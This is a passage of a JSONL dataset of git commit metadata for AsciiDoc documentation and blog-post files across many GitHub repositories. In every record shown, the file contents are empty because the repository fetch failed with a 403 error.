h,IanvsPoplicola\/elasticsearch,uschindler\/elasticsearch,mjhennig\/elasticsearch,Ansh90\/elasticsearch,kalburgimanjunath\/elasticsearch,fekaputra\/elasticsearch,dataduke\/elasticsearch,linglaiyao1314\/elasticsearch,njlawton\/elasticsearch,Siddartha07\/elasticsearch,dylan8902\/elasticsearch,KimTaehee\/elasticsearch,slavau\/elasticsearch,spiegela\/elasticsearch,infusionsoft\/elasticsearch,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,ivansun1010\/elasticsearch,wayeast\/elasticsearch,nrkkalyan\/elasticsearch,jango2015\/elasticsearch,milodky\/elasticsearch,polyfractal\/elasticsearch,IanvsPoplicola\/elasticsearch,kcompher\/elasticsearch,kalburgimanjunath\/elasticsearch,mute\/elasticsearch,yongminxia\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,hafkensite\/elasticsearch,markllama\/elasticsearch,MisterAndersen\/elasticsearch,karthikjaps\/elasticsearch,Shekharrajak\/elasticsearch,zkidkid\/elasticsearch,milodky\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,vietlq\/elasticsearch,ydsakyclguozi\/elasticsearch,pranavraman\/elasticsearch,likaiwalkman\/elasticsearch,HarishAtGitHub\/elasticsearch,NBSW\/elasticsearch,xpandan\/elasticsearch,luiseduardohdbackup\/elasticsearch,knight1128\/elasticsearch,KimTaehee\/elasticsearch,linglaiyao1314\/elasticsearch,markllama\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,truemped\/elasticsearch,clintongormley\/elasticsearch,mmaracic\/elasticsearch,rento19962\/elasticsearch,xingguang2013\/elasticsearch,JervyShi\/elasticsearch,elasticdog\/elasticsearch,iacdingping\/elasticsearch,petabytedata\/elasticsearch,pritishppai\/elasticsearch,mute\/elasticsearch,thecocce\/elasticsearch,onegambler\/elasticsearch,StefanGor\/elasticsearch,avikurapati\/elasticsearch,dataduke\/elasticsearch,nknize\/elasticsearch,sdauletau\/elasticsearch,JervyShi\/elasticsearch,sposam\/elasticsearch,obourgain\/elasticsearch,ESamir\/elasticsearch,zeroctu\/elasticsearch,mjhennig\/elasticsearch,Fsero\/elasticsearch,sarwarbhuiyan\/elasticsearch,ulkas\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,wittyameta\/elasticsearch,luiseduardohdbackup\/elasticsearch,queirozfcom\/elasticsearch,kingaj\/elasticsearch,SergVro\/elasticsearch,pablocastro\/elasticsearch,milodky\/elasticsearch,NBSW\/elasticsearch,Ansh90\/elasticsearch,Ansh90\/elasticsearch,iantruslove\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,areek\/elasticsearch,dataduke\/elasticsearch,humandb\/elasticsearch,geidies\/elasticsearch,beiske\/elasticsearch,ivansun1010\/elasticsearch,ouyangkongtong\/elasticsearch,YosuaMichael\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,adrianbk\/elasticsearch,rmuir\/elasticsearch,vingupta3\/elasticsearch,ouyangkongtong\/elasticsearch,slavau\/elasticsearch,martinstuga\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,mbrukman\/elasticsearch,HarishAtGitHub\/elasticsearch,jimczi\/elasticsearch,mm0\/elasticsearch,MetSystem\/elasticsearch,hechunwen\/elasticsearch,abibell\/elasticsearch,beiske\/elasticsearch,mcku\/elasticsearch,iantruslove\/elasticsearch,henakamaMSFT\/elasticsearch,gmarz\/elasticsearch,scottsom\/elasticsearch,sdauletau\/elasticsearch,iamjakob\/elasticsearch,iamjakob\/elasticsearch,hechunwen\/elasticsearch,hechunwen\/elasticsearch,martinstuga\/elasticsearch,markllama\/elasticsearch,JackyMai\/elasticsearch,Charlesdong\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,Fsero\/elasticsearch,artnowo\/elasticsearch,dongjoon-hyun\/elasticsearch,jpountz\/elasticsearch,hydro2k\/elasticsearch,tkssharma\/elasticsearch,hirdesh2008\/elasticsearch,rmuir\/elasticsearch,hydro2k\/elasticsearch,Uiho\/elasticsearch,smflorentino\/elasticsearch,tahaemin\/elasticsearch,mgalushka\/elasticsearch,hydro2k\/elasticsearch,fforbeck\/elasticsearch,PhaedrusTheGreek\/elasticsearch,areek\/elasticsearch,andrestc\/elasticsearch,petabytedata\/elasticsearch,Liziyao\/elasticsearch,sposam\/elasticsearch,pablocastro\/elasticsearch,dataduke\/elasticsearch,rento19962\/elasticsearch,strapdata\/elassandra-test,Uiho\/elasticsearch,huanzhong\/elasticsearch,polyfractal\/elasticsearch,SergVro\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,koxa29\/elasticsearch,zhiqinghuang\/elasticsearch,xingguang2013\/elasticsearch,springning\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e036446e5ab8d9a9805c3647d679e7e76d06cd4d","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb,Acidburn0zzz\/winreg-kb","old_file":"documentation\/User Assist keys.asciidoc","new_file":"documentation\/User Assist keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfcd0aa5db865e46dfebdd3aec11bb472c54a71f","subject":"Added coverage and CRAN badges to README.adoc","message":"Added coverage and CRAN badges to README.adoc","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8277bf88b7987fd766aa8d126340d8fe2aa003e","subject":"Create README.adoc","message":"Create README.adoc","repos":"Mogztter\/slm-browser,Mogztter\/slm-browser,Mogztter\/slm-browser","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mogztter\/slm-browser.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf0f8274dc0fcc3fc128654b160c2db27a6f2c5e","subject":"Update 2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","message":"Update 2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","new_file":"_posts\/2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"066a6829f39a0dd3a2be106dd01f8e3923ccf8f9","subject":"Add Spring boot actuator quote to commons","message":"Add Spring boot actuator quote to commons\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteSpringBootActuator.adoc","new_file":"src\/main\/docs\/common-quoteSpringBootActuator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5879c38771c42fc1091b1b8cc1fc5c2db8601777","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3d77b4062d15363dcf7e11d18d4f3f64b46d33f","subject":"Update 2095-1-1-Puzzle-6-Admission-e-ticket.adoc","message":"Update 2095-1-1-Puzzle-6-Admission-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2095-1-1-Puzzle-6-Admission-e-ticket.adoc","new_file":"_posts\/2095-1-1-Puzzle-6-Admission-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0daf639cb1a92ee806393cf3c09561148435533","subject":"Flesh out introduction and use cases a bit more","message":"Flesh out introduction and use cases a bit more\n\nChange-Id: Ife12e3124d465c4d9ffd1edd12c7b82ea6260dc0\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7886\nReviewed-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/introduction.adoc","new_file":"docs\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91501433c674d000f82617df30e4614c821bb482","subject":"Renamed '_posts\/2015-01-31-About-me.adoc' to '_posts\/2015-01-31-About-Page.adoc'","message":"Renamed '_posts\/2015-01-31-About-me.adoc' to '_posts\/2015-01-31-About-Page.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-31-About-Page.adoc","new_file":"_posts\/2015-01-31-About-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1733dacdf47796d6bb963f7d13671caa4ef72319","subject":"Update 2015-06-12-Hola-Mundo.adoc","message":"Update 2015-06-12-Hola-Mundo.adoc","repos":"heberqc\/heberqc.github.io,heberqc\/heberqc.github.io,heberqc\/heberqc.github.io","old_file":"_posts\/2015-06-12-Hola-Mundo.adoc","new_file":"_posts\/2015-06-12-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heberqc\/heberqc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"124d4d60ca308d308e3528b2bffc7a63ce08c7f5","subject":"Update 2015-08-23-First-Blog.adoc","message":"Update 2015-08-23-First-Blog.adoc","repos":"paolo215\/blog,paolo215\/blog,paolo215\/blog","old_file":"_posts\/2015-08-23-First-Blog.adoc","new_file":"_posts\/2015-08-23-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/paolo215\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41079c065884265b27ec28a78f29ed44f3f9ad12","subject":"Update 2016-04-11-Inyeccion-S-S-I.adoc","message":"Update 2016-04-11-Inyeccion-S-S-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"025d239327c10c9a3f2faeb0ab6842f9314479da","subject":"Update 2016-12-06-First-Blog-Post.adoc","message":"Update 2016-12-06-First-Blog-Post.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-06-First-Blog-Post.adoc","new_file":"_posts\/2016-12-06-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"814a50e2f83f232000b7563c124bfa748c5012c1","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4001c3ad5393b0531b5ffaa1464c85c96d11aa","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99892c59d6db5210a73294a0496374559a519a37","subject":"add DevoxxFr video","message":"add DevoxxFr video\n","repos":"oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"learn\/testimonialsAndCaseStudies.adoc","new_file":"learn\/testimonialsAndCaseStudies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43146d4b0d26f31dad18427d8e8bc1c5d7a06230","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef39217653124649788d8e871a406797177b03ee","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d05d4dfcc18c6196f53fd587fd434bd59580ff8d","subject":"Update 2018-09-11-Women.adoc","message":"Update 2018-09-11-Women.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-11-Women.adoc","new_file":"_posts\/2018-09-11-Women.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"294f64dd6952dbc674e7b43419af85cd10955205","subject":"Update 2015-02-22-The-first-post.adoc","message":"Update 2015-02-22-The-first-post.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-02-22-The-first-post.adoc","new_file":"_posts\/2015-02-22-The-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f25c28fb74157bf8f86657dc7f8d80671e789929","subject":"Add connect indexes section to docs","message":"Add connect indexes section to docs\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/connect\/indexes.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/connect\/indexes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wilkerlucio\/pathom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f15d99dd3e5828fe9ea8840ba822471e54cbd34","subject":"Added Forge 3.0.0.Final release announcement","message":"Added Forge 3.0.0.Final release announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-03-15-forge-3.0.0.final.asciidoc","new_file":"news\/2016-03-15-forge-3.0.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1084461e9703124927dfb94efd06f6d348e56262","subject":"2016-07-07-LoveWar.adoc","message":"2016-07-07-LoveWar.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-07-LoveWar.adoc","new_file":"_posts\/2016-07-07-LoveWar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5feeaaa219e3a268abb40214f3311436655d2117","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c95e9a9e45ff26d7b7df4c2a03be25ae70ce8b01","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee7d2bd21376eeb2d3bbe1671eb9d479e9919a24","subject":"Update 1993-12-12-goodgood-study.adoc","message":"Update 1993-12-12-goodgood-study.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-12-12-goodgood-study.adoc","new_file":"_posts\/1993-12-12-goodgood-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c519b64ac2f34657dfdd1fe6c135f4e5044e412","subject":"Update 2018-10-28-Test-Maven-360.adoc","message":"Update 2018-10-28-Test-Maven-360.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2018-10-28-Test-Maven-360.adoc","new_file":"_posts\/2018-10-28-Test-Maven-360.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"285b432dd3a0351d55202ac2d267bb892e5b3f84","subject":"Update 2016-10-06-Hello-world.adoc","message":"Update 2016-10-06-Hello-world.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-06-Hello-world.adoc","new_file":"_posts\/2016-10-06-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03136448e5675cfa6e00f3ed35b34e63b4035655","subject":"Update 2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","message":"Update 2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","repos":"thaibeouu\/blog,thaibeouu\/blog,thaibeouu\/blog,thaibeouu\/blog","old_file":"_posts\/2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","new_file":"_posts\/2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thaibeouu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7230b695c2ba34828fd822ec7d8bd80e82cd54f","subject":"Add develop index to the documentation (#9666)","message":"Add develop index to the documentation (#9666)\n\n","repos":"decidim\/decidim,decidim\/decidim,decidim\/decidim","old_file":"docs\/modules\/develop\/pages\/index.adoc","new_file":"docs\/modules\/develop\/pages\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/decidim\/decidim.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"32949021415602cfd120d710af45107d1c5973e8","subject":"Update 2015-09-21-dogs_in_india.adoc","message":"Update 2015-09-21-dogs_in_india.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-21-dogs_in_india.adoc","new_file":"_posts\/2015-09-21-dogs_in_india.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a3efa6e51c706788faf7e69b89119a314038a6f","subject":"add IN\/Clojure 2019, closes #314","message":"add IN\/Clojure 2019, closes #314\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/inclojure.adoc","new_file":"content\/events\/2019\/inclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f9d84fc06d71cb58f0ed5eed7be644ea761e1b91","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/08\/12\/deref.adoc","new_file":"content\/news\/2022\/08\/12\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4db59a5823c47b75c2755fd8fad81c10bd55bf1d","subject":"initial README with local install command","message":"initial README with local install command\n","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"helm-charts\/README.adoc","new_file":"helm-charts\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70e0ace709fa6cd271830a12402ce6587ac4f6ce","subject":"Update deployment info","message":"Update deployment info\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/deployment.asciidoc","new_file":"doc\/src\/main\/docs\/deployment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"158acb13610c71445ba918172d82c69783a31258","subject":"Update 2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","message":"Update 2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","new_file":"_posts\/2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bd8bc3c5a8b700b7e8dc63e6f832bca51f0fd12","subject":"Update 2015-03-02-Le-Cout-de-la-Vie.adoc","message":"Update 2015-03-02-Le-Cout-de-la-Vie.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-02-Le-Cout-de-la-Vie.adoc","new_file":"_posts\/2015-03-02-Le-Cout-de-la-Vie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33bb3a8d9b1b2a691e2dc73bd8de9f4d1b459bb5","subject":"y2b create post Motion Gaming: Who Cares? (Xbox One \\u0026 PS4)","message":"y2b create post Motion Gaming: Who Cares? (Xbox One \\u0026 PS4)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-17-Motion-Gaming-Who-Cares-Xbox-One-u0026-PS4.adoc","new_file":"_posts\/2013-06-17-Motion-Gaming-Who-Cares-Xbox-One-u0026-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8affc227c520e0ac66641a8b7a7b4bfc73f0b7bd","subject":"Update 2016-04-12-Consultas.adoc","message":"Update 2016-04-12-Consultas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Consultas.adoc","new_file":"_posts\/2016-04-12-Consultas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 